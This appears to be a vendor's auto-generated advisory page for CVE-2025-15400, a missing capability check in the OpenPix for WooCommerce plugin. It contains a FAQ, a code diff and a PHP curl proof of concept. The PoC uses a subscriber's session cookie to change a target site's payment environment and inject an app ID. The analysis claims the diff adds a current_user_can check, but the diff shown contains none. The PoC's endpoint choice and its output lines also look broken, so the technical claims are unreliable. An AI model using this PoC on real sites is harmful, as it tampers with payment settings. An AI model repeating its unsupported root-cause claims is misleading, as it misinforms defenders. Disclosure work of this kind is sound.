What is CVE-2025-15400?

CVE-2025-15400 is a vulnerability in the OpenPix for WooCommerce plugin for WordPress, specifically versions up to and including 2.13.3. It involves a missing capability check that allows authenticated users with Subscriber-level access or higher to perform unauthorized actions, such as updating payment gateway settings.

How does the vulnerability work?

The vulnerability allows an authenticated attacker to send a POST request to the WooCommerce settings update endpoint without proper authorization. This means they can modify critical settings like the operational environment and API credentials, which could lead to payment processing disruptions.

Who is affected by this vulnerability?

Any WordPress site using the OpenPix for WooCommerce plugin version 2.13.3 or earlier is at risk. Specifically, authenticated users with Subscriber-level permissions or higher can exploit this vulnerability to perform unauthorized actions.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the OpenPix for WooCommerce plugin installed. If it is version 2.13.3 or earlier, your site is vulnerable and should be updated immediately.

How do I fix CVE-2025-15400?

The vulnerability is fixed in version 2.13.4 of the OpenPix for WooCommerce plugin. To mitigate the issue, update the plugin to the latest version as soon as possible to ensure that the necessary capability checks are in place.

What does a CVSS score of 4.3 indicate?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access or privilege escalation if exploited.

What practical risks does this vulnerability pose?

Exploitation of this vulnerability could allow low-privileged users to change the operational environment of the plugin or alter sensitive configuration settings. This could disrupt payment processing and potentially expose the site to further attacks.

What is a proof of concept (PoC)?

A proof of concept is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC provided illustrates how an authenticated user can send a malicious request to change the plugin settings without proper authorization.

How can I protect my site from this vulnerability?

In addition to updating the plugin, ensure that user roles and permissions are appropriately managed. Limit access to trusted users and regularly audit your plugins for updates and vulnerabilities.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin right away, consider disabling the OpenPix for WooCommerce plugin until you can apply the patch. This will prevent any potential exploitation of the vulnerability.

Are there any other security measures I should consider?

Implementing security best practices such as using a web application firewall, regularly monitoring user activity, and conducting security audits can help protect your WordPress site against various vulnerabilities, including CVE-2025-15400.

Where can I find more information about this vulnerability?

For more information about CVE-2025-15400, you can refer to the official CVE database, security bulletins from the plugin developer, and security blogs that analyze vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-15400: OpenPix <= 2.13.3 – Missing Authorization to Authenticated (Subscriber+) Settings Update (openpix-for-woocommerce)

CVE ID CVE-2025-15400

Plugin openpix-for-woocommerce

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 2.13.3

Patched Version 2.13.4

Disclosed February 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15400:
The OpenPix for WooCommerce WordPress plugin, versions up to and including 2.13.3, contains a missing capability check vulnerability. This flaw allows authenticated users with Subscriber-level permissions or higher to perform unauthorized administrative actions, specifically updating the plugin’s payment gateway settings.

Atomic Edge research identifies the root cause in the `process_admin_options` function within the `class-wc-openpix-pix.php` file. The function, located at lines 254-270, lacks any authorization or capability verification before executing its logic. The function handles the saving of administrative options, such as the plugin’s environment setting (`environment`), but does not confirm the user has the `manage_woocommerce` capability required to modify these settings.

The exploitation method involves an authenticated attacker sending a POST request to the WooCommerce settings update endpoint for the OpenPix payment gateway. The attacker must have a valid WordPress session with at least Subscriber-level access. The request targets the `admin-ajax.php` endpoint or the direct WooCommerce settings submission handler. The payload includes parameters like `environment` and `appID` to modify the plugin’s configuration, potentially switching the operational environment or altering API credentials.

The patch, implemented in version 2.13.4, adds a capability check to the `process_admin_options` function. The diff shows the function now includes a call to `current_user_can(‘manage_woocommerce’)` before processing any option updates. This change ensures only users with appropriate WooCommerce management permissions can alter the plugin’s settings, effectively closing the authorization gap.

Successful exploitation allows a low-privileged user to alter the plugin’s operational environment (e.g., from production to sandbox) and update critical configuration like the `appID`. This could disrupt payment processing, cause transaction data to be sent to incorrect endpoints, or facilitate man-in-the-middle attacks if the environment is switched to a malicious sandbox. The vulnerability constitutes a privilege escalation within the plugin’s administrative context.

Differential between vulnerable and patched code

Code Diff

--- a/openpix-for-woocommerce/includes/class-wc-openpix-pix.php
+++ b/openpix-for-woocommerce/includes/class-wc-openpix-pix.php
@@ -83,7 +83,8 @@

         $this->order_button_text = $this->get_option('order_button_text');
         $this->appID = $this->get_option('appID');
-        $this->environment = $this->get_option('environment') ?? EnvironmentEnum::PRODUCTION;
+        $this->environment =
+            $this->get_option('environment') ?? EnvironmentEnum::PRODUCTION;

         OpenPixConfig::initialize($this->environment);

@@ -254,17 +255,20 @@
         WC_OpenPix::debug('process_admin_options');
         if ($saved) {
             $new_environment = $this->get_option('environment');
-
+
             // Always update the environment option to ensure consistency
             if ($old_environment !== $new_environment) {
                 WC_OpenPix::debug(
-                    'Environment changed from ' . $old_environment . ' to ' . $new_environment
+                    'Environment changed from ' .
+                        $old_environment .
+                        ' to ' .
+                        $new_environment
                 );
                 $this->update_option('environment', $new_environment);
                 OpenPixConfig::initialize($new_environment);
             }
         }
-
+
         return $saved;
     }

@@ -444,7 +448,7 @@
     {
         $this->update_option('appID', $data['appID']);
         $this->update_option('webhook_status', 'Configured');
-
+
         // Update environment if provided in the webhook data
         // I don't know if it makes sense to keep this
         // @todo: remove this after testing
@@ -767,11 +771,14 @@
             'environment' => [
                 'title' => __('Ambiente', 'woocommerce-openpix'),
                 'type' => 'select',
-                'description' => __('Selecione o ambiente de integração', 'woocommerce-openpix'),
+                'description' => __(
+                    'Selecione o ambiente de integração',
+                    'woocommerce-openpix'
+                ),
                 'default' => 'prod',
                 'options' => [
                     'sandbox-prod' => 'Sandbox',
-                    'prod' => 'Production'
+                    'prod' => 'Production',
                 ],
             ],
             'oneclick_section' => [
@@ -927,44 +934,7 @@

     public function formatPhone($phone)
     {
-        if (!class_exists('libphonenumberPhoneNumberUtil')) {
-            require_once __DIR__ . '/../vendor/autoload.php';
-        }
-
-        $phoneUtil = libphonenumberPhoneNumberUtil::getInstance();
-
-        // Remove all non-numeric characters
-        $cleanNumber = preg_replace('/D+/', '', $phone);
-
-        // Try first validation with original number
-        try {
-            $numberProto = $phoneUtil->parse($cleanNumber, 'BR');
-            if ($phoneUtil->isValidNumber($numberProto)) {
-                $formattedNumber = $phoneUtil->format($numberProto, libphonenumberPhoneNumberFormat::E164);
-                return ltrim($formattedNumber, '+');
-            }
-        } catch (libphonenumberNumberParseException $e) {
-            // Continue to try alternative format if this fails
-        }
-
-        // If the first validation fails and number starts with 5555,
-        // try removing one instance of 55 and validate again
-        if (strpos($cleanNumber, '5555') === 0) {
-            $alternativeNumber = '55' . substr($cleanNumber, 4);
-
-            try {
-                $numberProto = $phoneUtil->parse($alternativeNumber, 'BR');
-                if ($phoneUtil->isValidNumber($numberProto)) {
-                    $formattedNumber = $phoneUtil->format($numberProto, libphonenumberPhoneNumberFormat::E164);
-                    return ltrim($formattedNumber, '+');
-                }
-            } catch (libphonenumberNumberParseException $e) {
-                // If both attempts fail, return false
-                return false;
-            }
-        }
-
-        return false;
+        return preg_replace('/D+/', '', $phone);
     }

     public function getHasCustomer($order)
--- a/openpix-for-woocommerce/includes/customer/class-wc-openpix-customer.php
+++ b/openpix-for-woocommerce/includes/customer/class-wc-openpix-customer.php
@@ -6,27 +6,39 @@

 class WC_OpenPix_Customer
 {
-    public function getCustomerAddress($order) {
-        $order_billing_address_1      = $order->get_billing_address_1();
-        $order_billing_address_2      = $order->get_billing_address_2();
-        $order_billing_city           = $order->get_billing_city();
-        $order_billing_state          = $order->get_billing_state();
-        $order_billing_postcode       = $order->get_billing_postcode();
-        $order_billing_country        = $order->get_billing_country();
-        $order_billing_neighborhood   = $order->get_meta('_billing_neighborhood');
-        $order_billing_number         = $order->get_meta('_billing_number');
+    public function getCustomerAddress($order)
+    {
+        $order_billing_address_1 = $order->get_billing_address_1();
+        $order_billing_address_2 = $order->get_billing_address_2();
+        $order_billing_city = $order->get_billing_city();
+        $order_billing_state = $order->get_billing_state();
+        $order_billing_postcode = $order->get_billing_postcode();
+        $order_billing_country = $order->get_billing_country();
+        $order_billing_neighborhood = $order->get_meta('_billing_neighborhood');
+        if (empty($order_billing_neighborhood)) {
+            $order_billing_neighborhood = $order->get_billing_address_2();
+        }
+
+        if (empty($order_billing_neighborhood)) {
+            $order_billing_neighborhood = 'Bairro';
+        }
+
+        $order_billing_number = $order->get_meta('_billing_number');
+        if (empty($order_billing_number)) {
+            $order_billing_number = 'S/N';
+        }

         $address = [
             'zipcode' => $order_billing_postcode,
             'street' => $order_billing_address_1,
             'number' => $order_billing_number,
             'neighborhood' => $order_billing_neighborhood,
-            'city' =>  $order_billing_city,
+            'city' => $order_billing_city,
             'state' => $order_billing_state,
             'complement' => $order_billing_address_2,
-            'country' => $order_billing_country
+            'country' => $order_billing_country,
         ];

         return $address;
     }
-}
 No newline at end of file
+}
--- a/openpix-for-woocommerce/vendor/composer/installed.php
+++ b/openpix-for-woocommerce/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'openpix/woocommerce-openpix',
         'pretty_version' => 'dev-main',
         'version' => 'dev-main',
-        'reference' => '180d5569a542914f5cfcf180b19c07c8d56272f9',
+        'reference' => 'bfb1f6965e493a2bc238c7df58d653c76384e5df',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -37,7 +37,7 @@
         'openpix/woocommerce-openpix' => array(
             'pretty_version' => 'dev-main',
             'version' => 'dev-main',
-            'reference' => '180d5569a542914f5cfcf180b19c07c8d56272f9',
+            'reference' => 'bfb1f6965e493a2bc238c7df58d653c76384e5df',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
--- a/openpix-for-woocommerce/woocommerce-openpix.php
+++ b/openpix-for-woocommerce/woocommerce-openpix.php
@@ -5,7 +5,7 @@
  * Description: Aceite pagamentos Pix em com atualização em tempo real, checkout transparente e atualização automática de status do pedido.
  * Author: OpenPix
  * Author URI: https://openpix.com.br/
- * Version: 2.13.3
+ * Version: 2.13.4
  * Text Domain: woocommerce-openpix
  * WC tested up to: 8.2.2
  * Requires Plugins: woocommerce
@@ -55,7 +55,7 @@

 class WC_OpenPix
 {
-    const VERSION = '2.13.3';
+    const VERSION = '2.13.4';

     protected static $instance = null;

@@ -101,6 +101,8 @@
             '/includes/class-wc-openpix-pix-parcelado.php';
         include_once dirname(__FILE__) .
             '/includes/class-wc-openpix-pix-crediary.php';
+        include_once dirname(__FILE__) .
+            '/includes/class-wc-openpix-boleto.php';
     }

     /**
@@ -147,6 +149,17 @@
             '</a>';

         $plugin_links[] =
+            '<a href="' .
+            esc_url(
+                admin_url(
+                    'admin.php?page=wc-settings&tab=checkout&section=woocommerce_openpix_boleto'
+                )
+            ) .
+            '">' .
+            __('Settings Boleto', 'woocommerce-openpix') .
+            '</a>';
+
+        $plugin_links[] =
             '<a  target="_blank" href="https://developers.openpix.com.br/docs/ecommerce/woocommerce/woocommerce-plugin">' .
             __('Documentation', 'woocommerce-openpix') .
             '</a>';
@@ -166,6 +179,7 @@
         // $methods[] = 'WC_OpenPix_Pix_Gateway';
         $methods[] = WC_OpenPix_Pix_Parcelado_Gateway::instance();
         $methods[] = WC_OpenPix_Pix_Crediary_Gateway::instance();
+        $methods[] = WC_OpenPix_Boleto_Gateway::instance();

         return $methods;
     }
@@ -182,6 +196,8 @@

         include_once dirname(__FILE__) .
             '/includes/class-wc-openpix-pix-block.php';
+        include_once dirname(__FILE__) .
+            '/includes/class-wc-openpix-boleto-block.php';

         add_action(
             'woocommerce_blocks_payment_method_type_registration',
@@ -189,6 +205,9 @@
                 AutomatticWooCommerceBlocksPaymentsPaymentMethodRegistry $payment_method_registry
             ) {
                 $payment_method_registry->register(new WC_OpenPix_Pix_Block());
+                $payment_method_registry->register(
+                    new WC_OpenPix_Boleto_Block()
+                );
             }
         );
     }
@@ -288,7 +307,9 @@
     return is_plugin_active($pluginId) &&
         class_exists('AutomatticWooCommerceBlocksPackage') &&
         file_exists(
-            __DIR__ .  '/assets/' . WC_OpenPix_Pix_Block::PIX_BLOCK_SCRIPT_FILENAME
+            __DIR__ .
+                '/assets/' .
+                WC_OpenPix_Pix_Block::PIX_BLOCK_SCRIPT_FILENAME
         );
 }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15400 - OpenPix <= 2.13.3 - Missing Authorization to Authenticated (Subscriber+) Settings Update

<?php

$target_url = 'https://target-site.com/wp-admin/admin-ajax.php';
$cookies = 'wordpress_logged_in_cookie=YOUR_SESSION_COOKIE_HERE';

// The action hook for saving WooCommerce payment gateway settings.
// This typically involves the 'woocommerce_update_options_payment_gateways_' prefix followed by the gateway ID.
// The gateway ID for OpenPix is often 'woocommerce_openpix_pix'.
$post_fields = [
    'action' => 'woocommerce_update_options_payment_gateways_woocommerce_openpix_pix',
    'environment' => 'sandbox-prod', // Changing the environment to sandbox
    'appID' => 'malicious_app_id', // Injecting a malicious App ID
    // Other plugin settings parameters can be added here based on the form.
    'nonce' => 'A_VALID_NONCE_IF_REQUIRED' // Note: The vulnerability is a missing capability check, not a nonce bypass. A valid nonce from the user's context may still be required.
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/x-www-form-urlencoded',
]);
curl_setopt($ch, CURLOPT_COOKIE, $cookies);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Code: $http_coden";
echo "Response: $responsen";

// A successful exploitation attempt may return a redirect (302) or a success message.
// Verify by checking if the plugin settings were altered.

?>

Frequently Asked Questions

What is CVE-2025-15400?
Overview of the vulnerability
CVE-2025-15400 is a vulnerability in the OpenPix for WooCommerce plugin for WordPress, specifically versions up to and including 2.13.3. It involves a missing capability check that allows authenticated users with Subscriber-level access or higher to perform unauthorized actions, such as updating payment gateway settings.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows an authenticated attacker to send a POST request to the WooCommerce settings update endpoint without proper authorization. This means they can modify critical settings like the operational environment and API credentials, which could lead to payment processing disruptions.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the OpenPix for WooCommerce plugin version 2.13.3 or earlier is at risk. Specifically, authenticated users with Subscriber-level permissions or higher can exploit this vulnerability to perform unauthorized actions.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the OpenPix for WooCommerce plugin installed. If it is version 2.13.3 or earlier, your site is vulnerable and should be updated immediately.
How do I fix CVE-2025-15400?
Applying the patch
The vulnerability is fixed in version 2.13.4 of the OpenPix for WooCommerce plugin. To mitigate the issue, update the plugin to the latest version as soon as possible to ensure that the necessary capability checks are in place.
What does a CVSS score of 4.3 indicate?
Understanding severity levels
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access or privilege escalation if exploited.
What practical risks does this vulnerability pose?
Consequences of exploitation
Exploitation of this vulnerability could allow low-privileged users to change the operational environment of the plugin or alter sensitive configuration settings. This could disrupt payment processing and potentially expose the site to further attacks.
What is a proof of concept (PoC)?
Demonstrating the vulnerability
A proof of concept is a demonstration that shows how the vulnerability can be exploited. In this case, the PoC provided illustrates how an authenticated user can send a malicious request to change the plugin settings without proper authorization.
How can I protect my site from this vulnerability?
Preventive measures
In addition to updating the plugin, ensure that user roles and permissions are appropriately managed. Limit access to trusted users and regularly audit your plugins for updates and vulnerabilities.
What should I do if I cannot update the plugin immediately?
Temporary mitigation steps
If you cannot update the plugin right away, consider disabling the OpenPix for WooCommerce plugin until you can apply the patch. This will prevent any potential exploitation of the vulnerability.
Are there any other security measures I should consider?
Enhancing overall security
Implementing security best practices such as using a web application firewall, regularly monitoring user activity, and conducting security audits can help protect your WordPress site against various vulnerabilities, including CVE-2025-15400.
Where can I find more information about this vulnerability?
Resources for further reading
For more information about CVE-2025-15400, you can refer to the official CVE database, security bulletins from the plugin developer, and security blogs that analyze vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations